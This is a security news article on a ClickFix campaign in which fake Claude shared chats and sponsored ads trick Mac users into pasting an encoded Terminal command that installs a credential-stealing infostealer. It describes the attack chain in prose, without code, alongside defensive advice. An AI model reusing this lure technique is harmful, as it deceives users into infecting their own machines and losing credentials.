Fake Claude Search Results Lure Mac Users into ClickFix Attack
Attackers are using sponsored Google search results and shared Claude chats to deliver a ClickFix social-engineering attack targeting macOS users, leading to credential theft.
Cybercriminals are exploiting the popularity of Anthropic's Claude AI assistant by luring Mac users into a ClickFix attack through sponsored Google search results and shared Claude chats. Researchers at Malwarebytes discovered that when users search for terms like 'Claude Mac download,' they may see sponsored ads that appear to lead to the legitimate claude.ai domain. Instead, these ads redirect to real Claude shared chats designed to look like official 'Claude Code on Mac' or Apple Support guides.
The attack relies on the ClickFix social engineering method, which tricks users into infecting their own devices by running malicious commands. The fake support guides instruct victims to open Terminal and paste a base64-encoded command. This command downloads a loader shell script from attacker-controlled infrastructure and executes it in memory. The script then profiles the system, pulls down a second-stage payload, and runs it via osascript, macOS's built-in scripting engine. This grants the attacker remote code execution (RCE) without dropping a traditional application or binary.
The final payload is similar to the MacSync infostealer, which harvests browser credentials, cookies, Keychain contents, and crypto wallet data. All stolen information is bundled and exfiltrated over HTTP to attacker servers. Independent research by BleepingComputer confirmed another shared chat serving the same purpose, indicating an active campaign.
macOS Tahoe 26.4 and later include warnings about possible ClickFix attacks, but users on older versions remain vulnerable. Malwarebytes advises users to slow down and avoid rushing to follow instructions on webpages, especially those asking to run commands. Attackers often use urgency tactics like countdowns or user counters to bypass critical thinking.
To stay safe, users should never run code or commands copied from untrusted sources. Verify instructions independently through official documentation or support channels. Manually typing commands instead of copy-pasting can reduce the risk of hidden malicious payloads. Using up-to-date anti-malware solutions with web protection, such as Malwarebytes, can block connections to malicious sites. The free Malwarebytes Browser Guard extension warns when a website tries to copy something to the clipboard, adding an extra layer of defense.
This campaign highlights the evolving sophistication of ClickFix attacks, which now leverage AI brand popularity and search engine ads to reach victims. As AI tools become more integrated into workflows, users must remain vigilant against social engineering tactics that exploit trust in well-known brands.